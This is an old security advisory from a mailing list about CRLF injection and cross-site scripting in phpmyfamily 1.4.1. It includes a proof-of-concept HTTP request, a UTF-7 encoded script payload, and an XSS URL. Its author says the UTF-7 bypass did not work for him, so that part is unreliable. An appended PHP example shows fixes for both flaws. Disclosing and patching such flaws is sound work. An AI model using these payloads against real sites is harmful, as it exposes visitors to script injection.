Message-ID: <68cbfab10603270046x5ab00245gfc95f5ac3100aedf@mail.gmail.com>
Date: Mon Mar 27 09:46:17 2006
From: h4cky0u.org at gmail.com (h4cky0u)
Subject: HYSA-2006-007 phpmyfamily 1.4.1 CRLF injection & XSS
------------------------------------------------------
HYSA-2006-007 h4cky0u.org Advisory 016
------------------------------------------------------
Date - Mon March 27 2006
TITLE:
======
phpmyfamily v1.4.1 CRLF injection & XSS
SEVERITY:
=========
Medium
SOFTWARE:
=========
phpmyfamily v1.4.1
http://www.phpmyfamily.net/
INFO:
=====
phpmyfamily is a dynamic genealogy website builder which allows
geographically dispersed family members to maintain a central database of
research which is readily accessible and editable.
DESCRIPTION:
============
--== CRLF Injection ==--
GET /phpmyfamily/ HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: 127.0.0.1:80
Cookie: PHPSESSID=-4-2-=674sdasaf_
Connection: Close
Warning: session_start() [function.session-start]: The session id contains
illegal characters, valid characters are a-z, A-Z,
0-9 and '-,' in C:\AppServ\www\phpmyfamily\inc\config.inc.php on line 88
You can try to encode <script>alert('matrix_killer');</script> in UTF-7 like
this:
+ADw-+AHM-+AGM-+AHI-+AGk-+AHA-+AHQ-+AD4- alert('matrix_killer');
+ADw-/+AHM-+AGM-+AHI-+AGk-+AHA-+AHQ-+AD4-
This way you can bypass the protection, but I'm not sure that it will work.
For me it didn't, but I'm still a beginner with the CRLF attacks.
--== XSS ==--
http://127.0.0.1/phpmyfamily/track.php?person=00001&name='><script>alert();</script>&email=1&action=sub&submit=Wy%B6lij
VENDOR STATUS:
==============
Vendor was contacted but no response has been received to date.
CREDITS:
========
This vulnerability was discovered and researched by matrix_killer of h4cky0u
Security Forums.
mail : matrix_k at abv.bg
web : http://www.h4cky0u.org
Co-Researcher:
h4cky0u of h4cky0u Security Forums.
mail : h4cky0u at gmail.com
web : http://www.h4cky0u.org
Greets to all omega-team members + krassswr, EcLiPsE and all who support us!!!
ORIGINAL ADVISORY:
==================
http://www.h4cky0u.org/advisories/HYSA-2006-007-phpmyfamily.txt
--
http://www.h4cky0u.org
(In)Security at its best...
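
Added example, not part of the advisory and not phpmyfamily code: one way a PHP 7+ application can close the two inputs shown above, by rejecting a PHPSESSID outside the character set named in the quoted warning and by HTML-encoding the name parameter under a declared charset. All function names are hypothetical, and the sample values are copied from the advisory's request and URL.

```php
<?php
// Hypothetical helpers for illustration; phpmyfamily's own code is not shown on this page.

// True only for ids built from the characters the PHP warning lists as valid
// (a-z, A-Z, 0-9, '-' and ','). The length bound is an assumption.
function is_valid_session_id(string $id): bool
{
    return preg_match('/\A[A-Za-z0-9,-]{1,128}\z/', $id) === 1;
}

// Start a session without handing a malformed client id to session_start().
function start_session_safely(): void
{
    ini_set('display_errors', '0');   // keep warnings and file paths out of responses
    $cookie = $_COOKIE[session_name()] ?? null;
    if ($cookie !== null && !is_valid_session_id((string) $cookie)) {
        // An id set explicitly before session_start() takes precedence over the cookie.
        session_id(bin2hex(random_bytes(16)));
    }
    session_start();
}

// Encode a value for HTML text or a quoted attribute. ENT_QUOTES also encodes
// the single quote that the advisory's name='>... value uses to close an attribute.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Declare the charset so the browser is never left to guess one (such as UTF-7).
function send_html_headers(): void
{
    header('Content-Type: text/html; charset=UTF-8');
}

// Constructed demonstration using the values from the advisory.
$cookieFromAdvisory = '-4-2-=674sdasaf_';             // contains '=' and '_'
$nameFromAdvisory   = "'><script>alert();</script>";

var_dump(is_valid_session_id($cookieFromAdvisory));   // rejected as malformed
echo "<input type='text' name='name' value='" . h($nameFromAdvisory) . "'>\n";
```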